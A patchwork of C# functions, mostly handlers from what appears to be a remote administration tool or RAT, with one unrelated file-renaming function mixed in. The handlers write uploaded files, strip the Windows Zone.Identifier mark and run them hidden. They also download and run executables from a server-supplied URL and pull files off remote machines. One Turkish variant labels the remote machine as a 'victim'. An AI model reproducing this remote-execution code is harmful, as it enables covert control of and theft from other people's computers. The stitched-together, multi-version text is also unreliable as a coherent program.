public static void HandleDoUploadAndExecute(DoUploadAndExecute command, Networking.Client client) { if (!RenamedFiles.ContainsKey(command.Id)) { RenamedFiles.Add(command.Id, FileHelper.GetTempFilePath(Path.GetExtension(command.FileName))); } string filePath = RenamedFiles[command.Id]; try { if (command.CurrentBlock == 0 && Path.GetExtension(filePath) == ".exe" && !FileHelper.HasExecutableIdentifier(command.Block)) { throw new Exception("No executable file"); } var destFile = new FileSplitLegacy(filePath); if (!destFile.AppendBlock(command.Block, command.CurrentBlock)) { throw new Exception(destFile.LastError); } if ((command.CurrentBlock + 1) == command.MaxBlocks) // execute { if (RenamedFiles.ContainsKey(command.Id)) { RenamedFiles.Remove(command.Id); } FileHelper.DeleteZoneIdentifier(filePath); ProcessStartInfo startInfo = new ProcessStartInfo(); if (command.RunHidden) { startInfo.WindowStyle = ProcessWindowStyle.Hidden; startInfo.CreateNoWindow = true; } startInfo.UseShellExecute = false; startInfo.FileName = filePath; Process.Start(startInfo); client.Send(new SetStatus { Message = "Executed File" }); } } catch (Exception ex) { if (RenamedFiles.ContainsKey(command.Id)) { RenamedFiles.Remove(command.Id); } NativeMethods.DeleteFile(filePath); client.Send(new SetStatus { Message = $"Execution failed: {ex.Message}" }); } }
private void doRename() { List <string> parsedTokens = parseTokensFromPattern(); DateTimeReference = DateTime.Now; foreach (var file in SourceFiles) { var computedNewName = Pattern; foreach (var token in parsedTokens) { var tokenKey = token.Substring(0, 1); if (!Tokens.ContainsKey(tokenKey)) { throw new UnrecognizedReplacementToken(token); } var replacerFunc = Tokens[tokenKey]; computedNewName = replacerFunc(token, file, computedNewName); } computedNewName = Path.Combine(Path.GetDirectoryName(file), computedNewName); if (FileExists(computedNewName)) { throw new Exception($"Cannot rename {file} to {computedNewName} because the latter already exists"); } FileSystemCommands.FileMove(file, computedNewName); SendReport($"Renamed {file} to {computedNewName} using pattern {Pattern}", ReportType.Progress); RenamedFiles.Add(file, computedNewName); } }
public static void HandleDoClientUpdate(DoClientUpdate command, Networking.Client client) { // i dont like this updating... if anyone has a better idea feel free to edit it if (string.IsNullOrEmpty(command.DownloadUrl)) { if (!RenamedFiles.ContainsKey(command.Id)) { RenamedFiles.Add(command.Id, FileHelper.GetTempFilePath(".exe")); } string filePath = RenamedFiles[command.Id]; try { if (command.CurrentBlock == 0 && !FileHelper.HasExecutableIdentifier(command.Block)) { throw new Exception("No executable file"); } var destFile = new FileSplitLegacy(filePath); if (!destFile.AppendBlock(command.Block, command.CurrentBlock)) { throw new Exception(destFile.LastError); } if ((command.CurrentBlock + 1) == command.MaxBlocks) // Upload finished { if (RenamedFiles.ContainsKey(command.Id)) { RenamedFiles.Remove(command.Id); } client.Send(new SetStatus { Message = "Updating..." }); ClientUpdater.Update(client, filePath); } } catch (Exception ex) { if (RenamedFiles.ContainsKey(command.Id)) { RenamedFiles.Remove(command.Id); } NativeMethods.DeleteFile(filePath); client.Send(new SetStatus { Message = $"Update failed: {ex.Message}" }); } return; } new Thread(() => { client.Send(new SetStatus { Message = "Downloading file..." }); string tempFile = FileHelper.GetTempFilePath(".exe"); try { using (WebClient c = new WebClient()) { c.Proxy = null; c.DownloadFile(command.DownloadUrl, tempFile); } } catch { client.Send(new SetStatus { Message = "Download failed!" }); return; } client.Send(new SetStatus { Message = "Replacing executable..." }); ClientUpdater.Update(client, tempFile); }).Start(); }
public static void HandleDoDownloadFileResponse(Client client, DoDownloadFileResponse packet) { if (CanceledDownloads.ContainsKey(packet.ID) || string.IsNullOrEmpty(packet.Filename) || PausedDownloads.ContainsKey(packet.ID)) { return; } if (!Directory.Exists(client.Value.DownloadDirectory)) { Directory.CreateDirectory(client.Value.DownloadDirectory); } if (!Directory.Exists(Path.Combine(client.Value.DownloadDirectory, "temp"))) { Directory.CreateDirectory(Path.Combine(client.Value.DownloadDirectory, "temp")); } string metaFilePath = Path.Combine(client.Value.DownloadDirectory, "temp", packet.ID + ".meta"); string downloadPath = Path.Combine(client.Value.DownloadDirectory, packet.Filename); if (packet.CurrentBlock == 0 && File.Exists(downloadPath)) { for (int i = 1; i < 100; i++) { var newFileName = string.Format("{0} ({1}){2}", Path.GetFileNameWithoutExtension(downloadPath), i, Path.GetExtension(downloadPath)); if (File.Exists(Path.Combine(client.Value.DownloadDirectory, newFileName))) { continue; } downloadPath = Path.Combine(client.Value.DownloadDirectory, newFileName); RenamedFiles.Add(packet.ID, newFileName); break; } } else if (packet.CurrentBlock == 0 && Directory.Exists(downloadPath)) { for (int i = 1; i < 100; i++) { var newFileName = string.Format("{0} ({1})", downloadPath, i); if (Directory.Exists(Path.Combine(client.Value.DownloadDirectory, newFileName))) { continue; } downloadPath = Path.Combine(client.Value.DownloadDirectory, newFileName); RenamedFiles.Add(packet.ID, newFileName); break; } } else if (packet.CurrentBlock > 0 && (File.Exists(downloadPath) || Directory.Exists(downloadPath)) && RenamedFiles.ContainsKey(packet.ID)) { downloadPath = Path.Combine(client.Value.DownloadDirectory, RenamedFiles[packet.ID]); } // Handle crashed renamed files too if (packet.CurrentBlock > 0 && File.Exists(metaFilePath)) { var tmpMeta = new MetaFile(File.ReadAllBytes(metaFilePath)); if (tmpMeta.LocalPath != downloadPath && tmpMeta.LocalPath != "") { downloadPath = tmpMeta.LocalPath; } } if (client.Value == null || client.Value.FrmFm == null) { FrmMain.Instance.SetStatusByClient(client, "Download aborted, please keep the File Manager open."); new Packets.ServerPackets.DoDownloadFileCancel(packet.ID).Execute(client); return; } int index = client.Value.FrmFm.GetTransferIndex(packet.ID); if (index < 0) { return; } if (!string.IsNullOrEmpty(packet.CustomMessage)) { if (client.Value.FrmFm == null) // abort download when form is closed { return; } client.Value.FrmFm.UpdateTransferStatus(index, packet.CustomMessage, 0); return; } byte[] prevHash = new byte[16]; byte[] hashSample = new byte[FileSplit.MAX_BLOCK_SIZE]; if (File.Exists(downloadPath)) { using (var fs = new FileStream(downloadPath, FileMode.Open)) { fs.Seek(-FileSplit.MAX_BLOCK_SIZE, SeekOrigin.End); fs.Read(hashSample, 0, FileSplit.MAX_BLOCK_SIZE); } using (var md5 = MD5.Create()) prevHash = md5.ComputeHash(hashSample); } FileSplit destFile = new FileSplit(downloadPath); if (!destFile.AppendBlock(packet.Block, packet.CurrentBlock)) { if (client.Value == null || client.Value.FrmFm == null) { return; } client.Value.FrmFm.UpdateTransferStatus(index, destFile.LastError, 0); return; } byte[] curHash; hashSample = new byte[FileSplit.MAX_BLOCK_SIZE]; using (var fs = new FileStream(downloadPath, FileMode.Open)) { fs.Seek(-FileSplit.MAX_BLOCK_SIZE, SeekOrigin.End); fs.Read(hashSample, 0, FileSplit.MAX_BLOCK_SIZE); } using (var md5 = MD5.Create()) curHash = md5.ComputeHash(hashSample); decimal progress = Math.Round((decimal)((double)(packet.CurrentBlock + 1) / (double)packet.MaxBlocks * 100.0), 2); decimal speed; int timeLeft = 0; try { speed = Math.Round((decimal)(packet.CurrentBlock * FileSplit.MAX_BLOCK_SIZE) / (DateTime.Now - packet.StartTime).Seconds, 0); timeLeft = (int)(((FileSplit.MAX_BLOCK_SIZE * (packet.MaxBlocks - packet.CurrentBlock)) / 1000) / (speed / 1000)); } catch (DivideByZeroException) { speed = 0; } MetaFile metaFile; // Paused/crashed folder downloads require this if (File.Exists(metaFilePath)) { metaFile = new MetaFile(File.ReadAllBytes(metaFilePath)); metaFile.CurrentBlock++; metaFile.TransferId = packet.ID; metaFile.Progress = progress; metaFile.PrevHash = prevHash; metaFile.CurHash = curHash; metaFile.RemotePath = packet.RemotePath; metaFile.LocalPath = downloadPath; metaFile.Type = TransferType.Download; } else { metaFile = new MetaFile(packet.CurrentBlock + 1, packet.ID, progress, prevHash, curHash, packet.RemotePath, downloadPath, TransferType.Download); } metaFile.Save(metaFilePath); if (client.Value == null || client.Value.FrmFm == null) { return; } if (CanceledDownloads.ContainsKey(packet.ID)) { return; } client.Value.FrmFm.UpdateTransferStatus(index, string.Format("Downloading...({0}%)", progress), -1, TimeSpan.FromSeconds(timeLeft), speed); if ((packet.CurrentBlock + 1) == packet.MaxBlocks) { if (client.Value.FrmFm == null) { return; } try { File.Delete(metaFilePath); } catch { } RenamedFiles.Remove(packet.ID); if (packet.Type == ItemType.Directory) { client.Value.FrmFm.UpdateTransferStatus(index, "Unpacking directory", -1); var vDir = new VirtualDirectory().DeSerialize(downloadPath); if (File.Exists(downloadPath + ".bkp")) { File.Delete(downloadPath + ".bkp"); } File.Move(downloadPath, downloadPath + ".bkp"); try { vDir.SaveToDisk(Path.GetDirectoryName(downloadPath)); if (File.Exists(downloadPath + ".bkp")) { File.Delete(downloadPath + ".bkp"); } } catch { } } client.Value.FrmFm.UpdateTransferStatus(index, "Completed", 1); } }
public static void HandleDoDownloadFileResponse(Client client, DoDownloadFileResponse packet) { if (CanceledDownloads.ContainsKey(packet.ID) || string.IsNullOrEmpty(packet.Filename)) { return; } if (!Directory.Exists(client.Value.DownloadDirectory)) { Directory.CreateDirectory(client.Value.DownloadDirectory); } string downloadPath = Path.Combine(client.Value.DownloadDirectory, packet.Filename); if (packet.CurrentBlock == 0 && File.Exists(downloadPath)) { for (int i = 1; i < 100; i++) { var newFileName = string.Format("{0} ({1}){2}", Path.GetFileNameWithoutExtension(downloadPath), i, Path.GetExtension(downloadPath)); if (File.Exists(Path.Combine(client.Value.DownloadDirectory, newFileName))) { continue; } downloadPath = Path.Combine(client.Value.DownloadDirectory, newFileName); RenamedFiles.Add(packet.ID, newFileName); break; } } else if (packet.CurrentBlock > 0 && File.Exists(downloadPath) && RenamedFiles.ContainsKey(packet.ID)) { downloadPath = Path.Combine(client.Value.DownloadDirectory, RenamedFiles[packet.ID]); } if (client.Value == null || client.Value.FrmFm == null) { AnaForm.Instance.KurbanDurumuAyarla(client, "İndirme iptal edildi, Lütfen Dosya Yöneticisini Açık Tutunuz."); new DoDownloadFileCancel(packet.ID).Execute(client); return; } var index = client.Value.FrmFm.GetTransferIndex(packet.ID); if (index < 0) { return; } if (!string.IsNullOrEmpty(packet.CustomMessage)) { if (client.Value.FrmFm == null) { return; } client.Value.FrmFm.UpdateTransferStatus(index, packet.CustomMessage, 0); return; } var destFile = new FileSplit(downloadPath); if (!destFile.AppendBlock(packet.Block, packet.CurrentBlock)) { if (client.Value == null || client.Value.FrmFm == null) { return; } client.Value.FrmFm.UpdateTransferStatus(index, destFile.LastError, 0); return; } var progress = Math.Round((decimal)((packet.CurrentBlock + 1) / (double)packet.MaxBlocks * 100.0), 2); if (client.Value == null || client.Value.FrmFm == null) { return; } if (CanceledDownloads.ContainsKey(packet.ID)) { return; } client.Value.FrmFm.UpdateTransferStatus(index, string.Format("İndiriliyor...({0}%)", progress), -1); if ((packet.CurrentBlock + 1) == packet.MaxBlocks) { if (client.Value.FrmFm == null) { return; } RenamedFiles.Remove(packet.ID); client.Value.FrmFm.UpdateTransferStatus(index, "Tamamlandı", 1); } }
public static void HandleDoDownloadFileResponse(Client client, DoDownloadFileResponse packet) { if (CanceledDownloads.ContainsKey(packet.ID) || string.IsNullOrEmpty(packet.Filename)) { return; } // don't escape from download directory if (packet.Filename.IndexOfAny(DISALLOWED_FILENAME_CHARS) >= 0 || Path.IsPathRooted(packet.Filename)) { // disconnect malicious client client.Disconnect(); return; } if (!Directory.Exists(client.Value.DownloadDirectory)) { Directory.CreateDirectory(client.Value.DownloadDirectory); } string downloadPath = Path.Combine(client.Value.DownloadDirectory, packet.Filename); if (packet.CurrentBlock == 0 && File.Exists(downloadPath)) { for (int i = 1; i < 100; i++) { var newFileName = string.Format("{0} ({1}){2}", Path.GetFileNameWithoutExtension(downloadPath), i, Path.GetExtension(downloadPath)); if (File.Exists(Path.Combine(client.Value.DownloadDirectory, newFileName))) { continue; } downloadPath = Path.Combine(client.Value.DownloadDirectory, newFileName); RenamedFiles.Add(packet.ID, newFileName); break; } } else if (packet.CurrentBlock > 0 && File.Exists(downloadPath) && RenamedFiles.ContainsKey(packet.ID)) { downloadPath = Path.Combine(client.Value.DownloadDirectory, RenamedFiles[packet.ID]); } if (client.Value == null || client.Value.FrmFm == null) { FrmMain.Instance.SetStatusByClient(client, "Download aborted, please keep the File Manager open."); new Packets.ServerPackets.DoDownloadFileCancel(packet.ID).Execute(client); return; } int index = client.Value.FrmFm.GetTransferIndex(packet.ID); if (index < 0) { return; } if (!string.IsNullOrEmpty(packet.CustomMessage)) { if (client.Value.FrmFm == null) // abort download when form is closed { return; } client.Value.FrmFm.UpdateTransferStatus(index, packet.CustomMessage, 0); return; } FileSplit destFile = new FileSplit(downloadPath); if (!destFile.AppendBlock(packet.Block, packet.CurrentBlock)) { if (client.Value == null || client.Value.FrmFm == null) { return; } client.Value.FrmFm.UpdateTransferStatus(index, destFile.LastError, 0); return; } decimal progress = Math.Round((decimal)((double)(packet.CurrentBlock + 1) / (double)packet.MaxBlocks * 100.0), 2); if (client.Value == null || client.Value.FrmFm == null) { return; } if (CanceledDownloads.ContainsKey(packet.ID)) { return; } client.Value.FrmFm.UpdateTransferStatus(index, string.Format("Downloading...({0}%)", progress), -1); if ((packet.CurrentBlock + 1) == packet.MaxBlocks) { if (client.Value.FrmFm == null) { return; } RenamedFiles.Remove(packet.ID); client.Value.FrmFm.UpdateTransferStatus(index, "Completed", 1); } }